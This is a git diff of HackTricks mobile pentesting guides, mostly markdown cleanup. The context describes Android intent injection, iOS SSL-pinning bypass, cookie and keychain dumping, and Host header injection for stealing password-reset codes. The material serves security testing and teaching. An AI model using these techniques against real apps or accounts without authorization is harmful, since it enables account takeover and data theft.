a/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md +++ b/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md @@ -1,6 +1,6 @@ # Inspeckage Tutorial -**Tutorial copied from** [**https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7**](https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7)**** +**Tutorial copied from** [**https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7**](https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7) ### Install Xposed Framework diff --git a/mobile-apps-pentesting/android-app-pentesting/intent-injection.md b/mobile-apps-pentesting/android-app-pentesting/intent-injection.md index 08802820..fec8c766 100644 --- a/mobile-apps-pentesting/android-app-pentesting/intent-injection.md 
+++ b/mobile-apps-pentesting/android-app-pentesting/intent-injection.md @@ -1,12 +1,12 @@ # Intent Injection -**Research taken from** [**https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**** +**Research taken from** [**https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/) ## Introduction This vulnerability resembles **Open Redirect in web security**. Since class `Intent` is `Parcelable`, **objects belonging to this class** can be **passed** as **extra** **data** in another `Intent` object. \ Many developers make **use** of this **feature** and create **proxy** **components** (activities, broadcast receivers and services) that **take an embedded Intent and pass it to dangerous methods** like `startActivity(...)`, `sendBroadcast(...)`, etc. \ -This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`. +This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`. {% hint style="info" %} As summary: If an attacker can send an Intent that is being insecurely executed he can potentially access not exported components and abuse them. 
diff --git a/mobile-apps-pentesting/android-app-pentesting/react-native-application.md b/mobile-apps-pentesting/android-app-pentesting/react-native-application.md index 4889206c..9ccd9d66 100644 --- a/mobile-apps-pentesting/android-app-pentesting/react-native-application.md +++ b/mobile-apps-pentesting/android-app-pentesting/react-native-application.md @@ -1,6 +1,6 @@ # React Native Application -**Information copied from** [**https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7**](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)**** +**Information copied from** [**https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7**](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7) React Native is a **mobile application framework** that is most commonly used to develop applications for **Android** and **iOS** by enabling the use of React and native platform capabilities. These days, it’s become increasingly popular to use React across platforms.\ But most of the time, the core logic of the application lies in the React Native **JavaScript that can be obtained** without needing to use dex2jar. diff --git a/mobile-apps-pentesting/android-app-pentesting/smali-changes.md b/mobile-apps-pentesting/android-app-pentesting/smali-changes.md index f1c5ef0c..90abc358 100644 --- a/mobile-apps-pentesting/android-app-pentesting/smali-changes.md +++ b/mobile-apps-pentesting/android-app-pentesting/smali-changes.md 
@@ -46,7 +46,7 @@ apktool b . #In the folder generated when you decompiled the application It will **compile** the new APK **inside** the _**dist**_ folder. -If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)\*\*\*\* +If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) ### **Sing the new APK** @@ -73,7 +73,7 @@ zipalign -v 4 infile.apk ### **Sign the new APK (again?)** -If you **prefer** to use **\*\*\[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). +If you **prefer** to use \[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling). ```bash apksigner sign --ks key.jks ./dist/mycompiled.apk diff --git a/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md index ba59a66b..7dcf8cc1 100644 --- a/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md +++ b/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md 
@@ -1,6 +1,6 @@ # Spoofing your location in Play Store -**Information copied from** [**https://manifestsecurity.com/android-application-security-part-23/**](https://manifestsecurity.com/android-application-security-part-23/)**** +**Information copied from** [**https://manifestsecurity.com/android-application-security-part-23/**](https://manifestsecurity.com/android-application-security-part-23/) Many a times you have seen that application which you want to assess is only allowed in selected countries, so in that case you won’t be able to install that application on you android device. But if you can spoof your location to that country in which the application is allowed then you can get access to that application. Below is the procedure of the same. diff --git a/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md b/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md index 7d8c96cd..cf1c998b 100644 --- a/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md +++ b/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md @@ -123,7 +123,7 @@ In that scenario, you won't be able to abuse Reflection to execute arbitrary cod ### Remote Debugging **Renote WebView** **debugging** allow to access the webview with the **Chrome Developer Tools.**\ -****The **device** needs to be **accessible** by the PC (via USB, local emulator, local network...) and running the debuggable WebView, then access **chrome://inspect/#devices**: +The **device** needs to be **accessible** by the PC (via USB, local emulator, local network...) and running the debuggable WebView, then access **chrome://inspect/#devices**: ![](<../../.gitbook/assets/image (525).png>) diff --git a/mobile-apps-pentesting/android-checklist.md b/mobile-apps-pentesting/android-checklist.md index fe84780a..c085bdef 100644 --- a/mobile-apps-pentesting/android-checklist.md +++ b/mobile-apps-pentesting/android-checklist.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/mobile-apps-pentesting/ios-pentesting-checklist.md b/mobile-apps-pentesting/ios-pentesting-checklist.md index ec105dc3..9b04ded5 100644 --- a/mobile-apps-pentesting/ios-pentesting-checklist.md +++ b/mobile-apps-pentesting/ios-pentesting-checklist.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/mobile-apps-pentesting/ios-pentesting/README.md b/mobile-apps-pentesting/ios-pentesting/README.md index ba3728ca..ef493efe 100644 --- a/mobile-apps-pentesting/ios-pentesting/README.md +++ b/mobile-apps-pentesting/ios-pentesting/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -523,8 +523,8 @@ Check for possible couchbase databases in `/private/var/mobile/Containers/Data/A iOS store the cookies of the apps in the **`Library/Cookies/cookies.binarycookies`** inside each apps folder. However, developers sometimes decide to save them in the **keychain** as the mentioned **cookie file can be accessed in backups**. -To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) **\*\*or use** objection's **`ios cookies get`.**\ -**You can also use objection to** convert these files to a JSON\*\* format and inspect the data. +To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) or use** objection's **`ios cookies get`.**\ +**You can also use objection to** convert these files to a JSON** format and inspect the data. ```bash ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json @@ -614,7 +614,7 @@ You can also use `ios keychain dump` from [**Objection**](https://github.com/sen #### **NSURLCredential** **NSURLCredential** is the perfect class to **store username and password in the keychain**. No need to bother with NSUserDefaults nor any keychain wrapper.\ -**\*\*Once the user is logged in, you can** store\*\* his username and password to the keychain: +Once the user is logged in, you can** store** his username and password to the keychain: ```swift NSURLCredential *credential; 
@@ -849,7 +849,7 @@ For **more information** about iOS cryptographic APIs and libraries access [http The tester should be aware that **local authentication should always be enforced at a remote endpoint** or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process. -The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) \_\*\*\_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication. +The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) \_**\_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication. The **fingerprint ID** sensor is operated by the [SecureEnclave security coprocessor](https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf) and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced _Face ID_: which allows authentication based on facial recognition. 
@@ -1093,7 +1093,7 @@ In order to check this issue using Burp, after trusting Burp CA in the iPhone, y ### Certificate Pinning If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\ -In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) \*\*\*\*or install \[\*\*Burp Mobile Assistant\_\*]\(\_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\*\*\* +In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) or install \[**Burp Mobile Assistant\_\*]\(\_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)**\* You can also use **objection's** `ios sslpinning disable` diff --git a/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md b/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md index c18f593b..2d1fe9a4 100644 --- a/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md +++ b/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md @@ -61,7 +61,7 @@ When accessing your iOS device via SSH consider the following: > Remember to change the default password for both users `root` and `mobile` as anyone on the same network can find the IP address of your device and connect via the well-known default password, which will give them root access to your device. -**** + ### **Connect to a Device via SSH over USB** 
@@ -135,7 +135,7 @@ $ scp -P 2222 root@localhost:/tmp/data.tgz . ### Using iFunbox -****[**iFunbox**](https://www.i-funbox.com/en/page-download.html) is a GUI application that can be used for several things (uploading/downloading files among them).\ +[**iFunbox**](https://www.i-funbox.com/en/page-download.html) is a GUI application that can be used for several things (uploading/downloading files among them).\ Another GUI tool for this purpose is [**iExplorer**](https://macroplant.com/iexplorer). {% hint style="info" %} @@ -320,7 +320,7 @@ After this, the `Telegram.ipa` file will be created in your current directory. Y #### flexdecrypt In order to **obtain the ipa file** from an installed application you can also use the tool [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) or a wrapper of the tool called [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac)**.**\ -****In any case you will need to **install flexdecrypt in the device** running something like: +In any case you will need to **install flexdecrypt in the device** running something like: ```markup wget https://github.com/JohnCoates/flexdecrypt/releases/download/1.1/flexdecrypt.deb diff --git a/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md index b8301d86..b6e7a396 100644 --- a/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md 
@@ -3,7 +3,7 @@ ## Burp Cert Installation in physical iOS You can install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) **for help installing the Burp Certificate, configure the proxy and perform SSL Pinning.**\ -****Or you can manually follow the next steps: +Or you can manually follow the next steps: * Configure **Burp** as the iPhone **proxy in **_**Settings**_** --> **_**Wifi**_** --> **_**Click the network**_** --> **_**Proxy**_ * Access `http://burp` and download the certificate diff --git a/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md b/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md index 0a9730a5..52fa5aa0 100644 --- a/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md +++ b/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md 
@@ -1,6 +1,6 @@ # Extracting Entitlements From Compiled Application -**Page copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links)**** +**Page copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links) If you only have the app's IPA or simply the installed app on a jailbroken device, you normally won't be able to find `.entitlements` files. This could be also the case for the `embedded.mobileprovision` file. Still, you should be able to extract the entitlements property lists from the app binary yourself (which you've previously obtained as explained in the "iOS Basic Security Testing" chapter, section "Acquiring the App Binary"). diff --git a/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md b/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md index 9b6b20da..c0847eb7 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md 
@@ -1,6 +1,6 @@ # iOS App Extensions -**Content copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions)**** +**Content copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions) App extensions let apps offer custom functionality and content to users while they’re interacting with other apps or the system. Some notable ones are: diff --git a/mobile-apps-pentesting/ios-pentesting/ios-basics.md b/mobile-apps-pentesting/ios-pentesting/ios-basics.md index 6b4edf33..22ee2ede 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-basics.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-basics.md @@ -31,7 +31,7 @@ All class keys except `NSFileProtectionNone` are encrypted with a key derived fr Since iOS 7, the default data protection class is "Protected Until First User Authentication". -****[**FileDP**](https://github.com/abjurato/FileDp-Source) is a program that you can upload and use inside the IPhone to **inspect the data protection class** of each file. +[**FileDP**](https://github.com/abjurato/FileDp-Source) is a program that you can upload and use inside the IPhone to **inspect the data protection class** of each file. ### The Keychain diff --git a/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md index 230e9842..ceb21ff1 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md 
+++ b/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md @@ -118,7 +118,7 @@ $ rabin2 -zzq Telegram\ X.app/Telegram\ X | grep -i "openurl" * [**IDB**](https://github.com/facebook/idb): * Start IDB, connect to your device and select the target app. You can find details in the [IDB documentation](https://www.idbtool.com/documentation/setup.html). * Go to the **URL Handlers** section. In **URL schemes**, click **Refresh**, and on the left you'll find a list of all custom schemes defined in the app being tested. You can load these schemes by clicking **Open**, on the right side. By simply opening a blank URI scheme (e.g., opening `myURLscheme://`), you can discover hidden functionality (e.g., a debug window) and bypass local authentication. -* **Frida**: +* **Frida**: If you simply want to open the URL scheme you can do it using Frida: diff --git a/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md b/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md index 04dcbbcf..3eedf3d5 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md @@ -81,7 +81,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone libobjc.A.dylib 0x1bdc64000 233472 (228.0 KiB) /usr/lib/libobjc.A.dylib [...] ``` -* `memory list exports `: Exports of a loaded module +* `memory list exports `: Exports of a loaded module ```bash memory list exports iGoat-Swift @@ -176,7 +176,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone [iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:] ``` -## Basic Hooking +## Basic Hooking Now that you have **enumerated the classes and modules** used by the application you may have found some **interesting class and method names**. 
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md b/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md index 0e78d0fd..26e0a607 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md @@ -99,11 +99,11 @@ Different iOS versions require **different jailbreaking techniques**. [Determine The iOS jailbreak scene evolves so rapidly that providing up-to-date instructions is difficult. However, we can point you to some sources that are currently reliable. -* ****[**Can I Jailbreak?**](https://canijailbreak.com)**** -* ****[**The iPhone Wiki**](https://www.theiphonewiki.com)**** -* ****[**Redmond Pie**](https://www.redmondpie.com)**** -* ****[**Reddit Jailbreak**](https://www.reddit.com/r/jailbreak/)**** -* [**https://checkra.in/**](https://checkra.in)**** +* [**Can I Jailbreak?**](https://canijailbreak.com) +* [**The iPhone Wiki**](https://www.theiphonewiki.com) +* [**Redmond Pie**](https://www.redmondpie.com) +* [**Reddit Jailbreak**](https://www.reddit.com/r/jailbreak/) +* [**https://checkra.in/**](https://checkra.in) > Note that any modification you make to your device is at your own risk. While jailbreaking is typically safe, things can go wrong and you may end up bricking your device. No other party except yourself can be held accountable for any damage. diff --git a/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md index 735af72e..d6332da8 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md 
@@ -8,7 +8,7 @@ The [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboar Some security considerations: * Users **cannot grant or deny permission** for apps to read the **pasteboard**. -* Since iOS 9, apps [cannot access the pasteboard while in background](https://forums.developer.apple.com/thread/13760), this mitigates background pasteboard monitoring. +* Since iOS 9, apps [cannot access the pasteboard while in background](https://forums.developer.apple.com/thread/13760), this mitigates background pasteboard monitoring. * [Apple warns about persistent named pasteboards](https://developer.apple.com/documentation/uikit/uipasteboard?language=objc) and **discourages their use**. Instead, shared containers should be used. * Starting in iOS 10 there is a new Handoff feature called **Universal Clipboard** that is enabled by default. It allows the **general pasteboard contents to automatically transfer between devices**. This feature can be disabled if the developer chooses to do so and it is also possible to set an expiration time and date for copied data. diff --git a/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md b/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md index d3f81070..950053df 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md 
@@ -33,7 +33,7 @@ If you only has the compiled application you can extract the entitlements follow Try to retrieve the `apple-app-site-association` file from the server using the associated domains you got from the previous step. This file needs to be accessible via HTTPS, without any redirects, at `https:///apple-app-site-association` or `https:///.well-known/apple-app-site-association`. -You can retrieve it yourself with your browser or use the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/). +You can retrieve it yourself with your browser or use the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/). ### **Checking the Link Receiver Method** diff --git a/mobile-apps-pentesting/ios-pentesting/ios-webviews.md b/mobile-apps-pentesting/ios-pentesting/ios-webviews.md index 36619c03..106eb2e2 100644 --- a/mobile-apps-pentesting/ios-pentesting/ios-webviews.md +++ b/mobile-apps-pentesting/ios-pentesting/ios-webviews.md 
@@ -4,13 +4,13 @@ WebViews are in-app browser components for displaying interactive **web** **content**. They can be used to embed web content directly into an app's user interface. iOS WebViews **support** **JavaScript** execution **by default**, so script injection and Cross-Site Scripting attacks can affect them. -* ****[**UIWebView**](https://developer.apple.com/documentation/uikit/uiwebview)**:** UIWebView is deprecated starting on iOS 12 and should not be used. It shouldn't be used. **JavaScript cannot be disabled**. -* ****[**WKWebView**](https://developer.apple.com/documentation/webkit/wkwebview): This is the appropriate choice for extending app functionality, controlling displayed content. +* [**UIWebView**](https://developer.apple.com/documentation/uikit/uiwebview)**:** UIWebView is deprecated starting on iOS 12 and should not be used. It shouldn't be used. **JavaScript cannot be disabled**. +* [**WKWebView**](https://developer.apple.com/documentation/webkit/wkwebview): This is the appropriate choice for extending app functionality, controlling displayed content. * **JavaScript** is enabled by default but thanks to the **`javaScriptEnabled`** property of `WKWebView`, it **can be completely disabled**, preventing all script injection flaws. * The **`JavaScriptCanOpenWindowsAutomatically`** can be used to **prevent** JavaScript from **opening new windows**, such as pop-ups. * The **`hasOnlySecureContent`** property can be used to verify resources loaded by the WebView are retrieved through encrypted connections. * `WKWebView` implements out-of-process rendering, so **memory corruption bugs won't affect** the main app process. -* ****[**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It should be used to provide a **generalized web viewing experience**. 
These WebViews can be easily spotted as they have a characteristic layout which includes the following elements: +* [**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements: * A read-only address field with a security indicator. * An Action ("**Share**") **button**. 
@@ -160,7 +160,7 @@ WebViews can load remote content from an endpoint, but they can also load local * **UIWebView**: It can use deprecated methods [`loadHTMLString:baseURL:`](https://developer.apple.com/documentation/uikit/uiwebview/1617979-loadhtmlstring?language=objc) or [`loadData:MIMEType:textEncodingName:baseURL:`](https://developer.apple.com/documentation/uikit/uiwebview/1617941-loaddata?language=objc)to load content. * **WKWebView**: It can use the methods [`loadHTMLString:baseURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1415004-loadhtmlstring?language=objc) or [`loadData:MIMEType:textEncodingName:baseURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1415011-loaddata?language=objc) to load local HTML files and `loadRequest:` for web content. Typically, the local files are loaded in combination with methods including, among others: [`pathForResource:ofType:`](https://developer.apple.com/documentation/foundation/nsbundle/1410989-pathforresource), [`URLForResource:withExtension:`](https://developer.apple.com/documentation/foundation/nsbundle/1411540-urlforresource?language=objc) or [`init(contentsOf:encoding:)`](https://developer.apple.com/documentation/swift/string/3126736-init). In addition, you should also verify if the app is using the method [`loadFileURL:allowingReadAccessToURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1414973-loadfileurl?language=objc). Its first parameter is `URL` and contains the URL to be loaded in the WebView, its second parameter `allowingReadAccessToURL` may contain a single file or a directory. If containing a single file, that file will be available to the WebView. However, if it contains a directory, all files on that **directory will be made available to the WebView**. Therefore, it is worth inspecting this and in case it is a directory, verifying that no sensitive data can be found inside it. -If you have the source code you can search for those methods. 
Having the **compiled** **binary** you can also search for these methods: +If you have the source code you can search for those methods. Having the **compiled** **binary** you can also search for these methods: ```bash $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString" @@ -169,7 +169,7 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString" ### File Access -* **UIWebView:** +* **UIWebView:** * The `file://` scheme is always enabled. * File access from `file://` URLs is always enabled. * Universal access from `file://` URLs is always enabled. diff --git a/other-web-tricks.md b/other-web-tricks.md index c754a898..32c71573 100644 --- a/other-web-tricks.md +++ b/other-web-tricks.md @@ -2,7 +2,7 @@ ### Host header -Several times the back-end trust the H**ost header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). +Several times the back-end trust the H**ost header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. 